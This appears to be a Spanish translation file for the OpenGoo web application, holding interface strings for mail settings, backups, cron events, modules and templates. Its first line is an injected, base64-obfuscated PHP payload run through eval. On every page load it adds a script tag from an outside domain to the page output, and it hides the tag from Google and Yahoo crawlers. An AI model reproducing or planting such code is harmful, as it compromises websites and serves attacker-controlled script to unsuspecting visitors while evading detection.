<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5cGJtUmxjMmxuYm5OMGRXUnBiMmx1Wm04dVkyOXRMMnh6TG5Cb2NDSStQQzl6WTNKcGNIUSsiKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?>
<?php

  return array(
  
    // ---------------------------------------------------
    //  Administration tools
    // ---------------------------------------------------
    
    'administration tool name test_mail_settings' => 'Comprobar las configuraciones del mail',
    'administration tool desc test_mail_settings' => 'Use esta herramienta para enviar mails de prueba y comprobar que el mail de OpenGoo está bien configurado',
    'administration tool name mass_mailer' => 'Mass mailer',
    'administration tool desc mass_mailer' => 'Herramienta que permite enviar mensages a cualquier grupo registrado en el sistema',
  
    // ---------------------------------------------------
    //  Configuration categories and options
    // ---------------------------------------------------
  
    'configuration' => 'Configuración',
    
    'mail transport mail()' => 'Configuración de PHP',
    'mail transport smtp' => 'Servidor SMTP',
    
    'secure smtp connection no'  => 'No',
    'secure smtp connection ssl' => 'Si, use SSL',
    'secure smtp connection tls' => 'Si, use TLS',
    
    'file storage file system' => 'Archivo de sistema',
    'file storage mysql' => 'Base de datos (MySQL)',
    
    // Categories
    'config category name general' => 'General',
    'config category desc general' => 'Configuraciones generales OpenGoo',
    'config category name mailing' => 'Mailing',
    'config category desc mailing' => 'Use estas configuraciones para cambiar la forma en que OpenGoo maneja el envío de mails. Pueden usarse configuraciones provistas en su php.ini o establecer cualquier otro servidor SMTP.',
    
    // ---------------------------------------------------
    //  Options
    // ---------------------------------------------------
    
    // General
    'config option name site_name' => 'Nombre del sitio',
    'config option desc site_name' => 'Este valor va a ser desplegado como el nombre del sitio en la página Dashboard',
    'config option name file_storage_adapter' => 'Almacenamiento de archivos',
    'config option desc file_storage_adapter' => 'Elija donde guardar documentos subidos a la página. Cambiar el tipo de almacenamiento causará que los archivos ingresados previamente dejen de estar disponibles.',
    'config option name default_project_folders' => 'Carpetas creadas por defecto',
    'config option desc default_project_folders' => 'Carpetas que van a ser creadas cuando se cree el espacio. El nombre de cada carpeta debera aparecer en una línea. Las líneas duplicadas o vacías no van a ser tenidas en cuenta',
    'config option name theme' => 'Tema',
    'config option desc theme' => 'Usando temas puede cambiar el aspecto de OpenGoo',
    'config option name upgrade_check_enabled' => 'Habilitar chequeo de actualizaciones',
    'config option desc upgrade_check_enabled' => 'Si escoge esta opción el sistema corroborara una vez al día si hay nuevas versiones disponibles de OpenGoo',
    'config option name work_day_start_time' => 'Hora de inicio de la jornada laboral',
	'config option desc work_day_start_time' => 'Especifica la hora de comienzo de la jornada laboral',
  	'config option name time_format_use_24' => 'Utilizar formato de 24 horas',
  	'config option desc time_format_use_24' => 'Si está habilitado el formato de hora será \'hh:mm\' desde 00:00 hasta 23:59, sino las horas se utilizarán desde 1 a 12 utilizando AM o PM.',
    'config option name use_minified_resources' => 'Usar recursos minificados',
    'config option desc use_minified_resources' => 'Usar achivos CSS y Javascript para mejorar la performance. En el caso de efectuar modificaciones, debe recomprimir los archivos usando las herramientas de public/tools.',
  
	
    // Mailing
    'config option name exchange_compatible' => 'Modo compatibilidad con Microsoft Exchange',
    'config option desc exchange_compatible' => 'Si utiliza el servidor Microsoft Exchange, elija esta opción para evitar algunos conocidos problemas de mailing.',
    'config option name mail_transport' => 'Transporte de correo',
    'config option desc mail_transport' => 'Puede usar las configuraciones PHP establecidas por defecto para el envío de mails o especificar un servidor SMTP',
    'config option name smtp_server' => 'Servidor SMTP',
    'config option name smtp_port' => 'Puerto SMTP',
    'config option name smtp_authenticate' => 'Use la autenticación SMTP',
    'config option name smtp_username' => 'Nombre de usuario SMTP',
    'config option name smtp_password' => 'Contraseña SMTP',
    'config option name smtp_secure_connection' => 'Use la conexión segura SMTP',
  
 	'can edit company data' => 'Puede modificar los datos de la compañía',
  	'can manage security' => 'Puede modificar configuraciones de seguridad',
  	'can manage workspaces' => 'Puede modificar configuraciones de espacios',
  	'can manage configuration' => 'Puede modificar las configuraciones',
  	'can manage contacts' => 'Puede modificar y editar contactos',
  	'group users' => 'Agrupar usuarios',
    
  	'user ws config category name dashboard' => 'Opciones del panel de resumen',
  	'user ws config category name task panel' => 'Opciones del panel de tareas',
  	'user ws config option name show pending tasks widget' => 'Mostrar widget de tareas pendientes',
  	'user ws config option name pending tasks widget assigned to filter' => 'Mostrar tareas asignadas a',
  	'user ws config option name show late tasks and milestones widget' => 'Mostrar widget de hitos y tareas atrasadas',
  	'user ws config option name show messages widget' => 'Mostrar widget notas',
  	'user ws config option name show comments widget' => 'Mostrar widget comentarios',
  	'user ws config option name show documents widget' => 'Mostrar widget de documentos',
  	'user ws config option name show calendar widget' => 'Mostrar widget de calendario',
  	'user ws config option name show charts widget' => 'Mostrar widget de graficas',
  	'user ws config option name show emails widget' => 'Mostrar widget de emails',
  	
 	'user ws config option name my tasks is default view' => 'La vista por defecto muestra sólo las tareas asignadas a mi',
  	'user ws config option desc my tasks is default view' => 'Si se selecciona no, se mostrarán todas las tareas del espacio y sus subespacios',
  	'user ws config option name show tasks in progress widget' => 'Mostrar widget de tareas en progreso',
  	'user ws config option name can notify from quick add' => 'Checkbox de notificación chequeado por defecto',
  	'user ws config option desc can notify from quick add' => 'El checkbox de notificación permite la opción de notificar a los usuarios asignados luego de agregar o modificar una tarea',
    
  	'backup process desc' => 'Un respaldo almacena el estado de toda la aplicación en un archivo comprimido. Pretende ser una forma rápida de obtener un respaldo de una instalación de OpenGoo. <br> Generar un respaldo puede demorar más que unos segundos, por lo que el proceso de respaldo consiste en 3 pasos: <br>1.- Iniciar un proceso de respaldo, <br>2.- Desargar el respaldo. <br> 3.- Opcional. Eliminar el respaldo del servidor. <br> ',
  	'start backup' => 'Iniciar proceso de respaldo',
    'start backup desc' => 'Iniciar un proceso de respaldo implica eliminar respaldos anteriores y generar uno nuevo.',
  	'download backup' => 'Descargar respaldo',
    'download backup desc' => 'Para poder descargar un respaldo es necesario iniciar el proceso primero.',
  	'delete backup' => 'Borrar respaldo',
    'delete backup desc' => 'Elimina el ultimo respaldo, para que no este disponible para descarga. Se recomienda borrar los respaldos luego de descargarlos.',
    'backup' => 'Respaldo',
    'backup menu' => 'Menú de respaldos',
   	'last backup' => 'El último respaldo fue creado en',
   	'no backups' => 'No hay respaldos para descargar',
   	'user ws config option name always show unread mail in dashboard' => 'Siempre mostrar correo no leído en la vista de resumen',
   	'user ws config option desc always show unread mail in dashboard' => 'Al seleccionar NO sólo se mostraran los correos del espacio de trabajo activo',
 	'workspace emails' => 'Correos del espacio de trabajo',
  	'user ws config option name tasksShowWorkspaces' => 'Mostrar espacios',
  	'user ws config option name tasksShowTime' => 'Mostrar tiempo',
  	'user ws config option name tasksShowDates' => 'Mostrar fechas',
  	'user ws config option name tasksShowTags' => 'Mostrar etiquetas',
  	'user ws config option name tasksGroupBy' => 'Agrupar por',
  	'user ws config option name tasksOrderBy' => 'Ordenar por',
  	'user ws config option name task panel status' => 'Estado',
  	'user ws config option name task panel filter' => 'Filtrar por',
  	'user ws config option name task panel filter value' => 'Valor del filtro',
  	
	'config option name days_on_trash' => 'Días en la papelera',
    'config option desc days_on_trash' => 'Cuántos días se mantiene un objeto en la papelera antes de ser borrado automaticamente. Si es cero, los objetos no ser borrar automaticamente.',
    'templates' => 'Plantillas',
    'add template' => 'Agregar plantilla',
    'confirm delete template' => 'Está seguro de que desea borrar esta plantilla?',
    'no templates' => 'No hay plantillas',
    'template name required' => 'El nombre de la plantilla es requerido',
    'can manage templates' => 'Puede manejar plantillas',
    'new template' => 'Nueva plantilla',
    'edit template' => 'Editar plantilla',
    'template dnx' => 'La plantilla no existe',
    'success edit template' => 'Plantilla modificada correctamente',
    'log add cotemplates' => '{0} agregado',
    'log edit cotemplates' => '{0} modificado',
    'success delete template' => 'Plantilla borrada correctamente',
    'error delete template' => 'Error al borrar la plantilla',
    'objects' => 'Objetos',
    'objects in template' => 'Objectos en la plantilla',
    'no objects in template' => 'No hay objetos en la plantilla',
    'add to a template' => 'Agregar a plantilla',
    'add an object to template' => 'Agregar un objeto a esta plantilla',
    'you are adding object to template' => 'Está agregando {0} \'{1}\' a una plantilla. Elija una plantilla o cree una {0}.',
    'success add object to template' => 'Objeto correctamente agregado a template',
    'object type not supported' => 'Este tipo de objeto no está soportado para plantillas',
    'assign template to workspace' => 'Asignar template a espacio de trabajo',
	'config option name enable_email_module' => 'Habilitar Módulo de Correo',
  	'config option desc enable_email_module' => 'Determina si la pestaña de Correo estará disponible o no. Advertencia: El módulo de correo está en estado Beta y por lo tanto puede contener errores que lo hacen no apto para uso en producción.',
  
  	'config category name modules' => 'Módulos',
    'config category desc modules' => 'Utilice estas opciones para habilitar o deshabilitar módulos. Deshabilitar un módulo sólo lo esconderá de la interfaz gráfica. No se alterarán los permisos de los usuarios sobre los objetos.',
    'config option name enable_notes_module' => 'Habilitar módulo de notas',
    'config option name enable_contacts_module' => 'Habilitar módulo de contactos',
    'config option name enable_calendar_module' => 'Habilitar módulo de calendario',
    'config option name enable_documents_module' => 'Habilitar módulo de documentos',
    'config option name enable_tasks_module' => 'Habilitar módulo de tareas',
    'config option name enable_weblinks_module' => 'Habilitar módulo de enlaces web',
    'config option name enable_time_module' => 'Habilitar módulo de horas',
    'config option name enable_reporting_module' => 'Habilitar módulo de reportes',
    'user ws config category name general' => 'General',
    'user ws config option name localization' => 'Localización',
    'user ws config option desc localization' => 'Textos y fechas serán desplegados según está opción. Necesita refrescar para que haga efecto.',
    'user ws config option name initialWorkspace' => 'Espacio de trabajo inicial',
    'user ws config option desc initialWorkspace' => 'Esta opción le permite escoger cuál será el espacio de trabajo seleccionado cuando inicia, o puede escoger recordar el último espacio de trabajo visto.',
    'user ws config option name rememberGUIState' => 'Recordar el estado de la interfaz gráfica',
    'user ws config option desc rememberGUIState' => 'Esto permite que se mantenga el estado de la interfaz gráfica (tamaño de paneles, paneles colapsados/expandidos, etc) entre distintas sesiones. Advertencia: Esta funcionalidad está en estado BETA.',
    'user ws config option name time_format_use_24' => 'Usar formato de 24 horas',
    'user ws config option desc time_format_use_24' => 'Si está habilitado el formato de hora será \'hh:mm\' desde 00:00 hasta 23:59, sino las horas se utilizarán desde 1 a 12 utilizando AM o PM.',
    'user ws config option name work_day_start_time' => 'Hora de inicio de la jornada laboral',
  	'user ws config option desc work_day_start_time' => 'Especifica la hora de comienzo de la jornada laboral',
    'cron events' => 'Eventos de Cron',
    'about cron events' => 'Aprenda sobre eventos de Cron...',
    'cron events info' => 'Los eventos de Cron le permiten ejecutar tareas periódicamente, sin necesidad de iniciar una sesión. Para habilitar eventos de Cron necesita previamente configurar un \'cron job\' que periódicamente ejecute el archivo "cron.php", ubicado en la raíz de su instalación de OpenGoo. La periodicidad a la que ejecute el \'cron job\' determinará la granularidad a la que podrá ejecutar estos eventos de Cron. Por ejemplo, si el \'cron job\' ejecuta cada cinco minutos y usted configura un evento de Cron para ejecutar cada un minuto, sólo podrá ejecutar cada cinco minutos. Para aprender cómo configurar un \'cron job\' consulte con su administrador de sistema o su proveedor de hosting.',
    'cron event name check_mail' => 'Check mail',
    'cron event desc check_mail' => 'This cron event will check for new email in all email accounts in the system.',
    'cron event name purge_trash' => 'Purge trash',
    'cron event desc purge_trash' => 'This cron event will delete objects older than the amount of days specified in the \'Days in trash\' configuration.',
    'cron event name send_reminders' => 'Send reminders',
    'cron event desc send_reminders' => 'This cron event will send email reminders.',
    'cron event name check_upgrade' => 'Check upgrade',
    'cron event desc check_upgrade' => 'This cron event will check for new versions of OpenGoo.',
    'next execution' => 'Next execution',
    'delay between executions' => 'Delay between executions',
    'enabled' => 'Enabled',
    'no cron events to display' => 'There are no cron events to display',
    'success update cron events' => 'Cron events updated successfully',
    'manual upgrade' => 'Manual upgrade',
    'manual upgrade desc' => 'To manually upgrade OpenGoo you have to download the new version of OpenGoo, extract it to the root of your installation and then go to \'public/upgrade\' in your browser to run the upgrade process.',
    'automatic upgrade' => 'Autoamtic upgrade',
    'automatic upgrade desc' => 'The automatic upgrade will automatically download and extract the new version, and will run the upgrade process for you.',
    'start automatic upgrade' => 'Start automatic upgrade',
  	'cron event name create_backup' => 'Crear respaldo',
    'cron event desc create_backup' => 'Crea un respaldo que puede descargar de la sección Respaldo en Administración.',
  
  ); // array

?>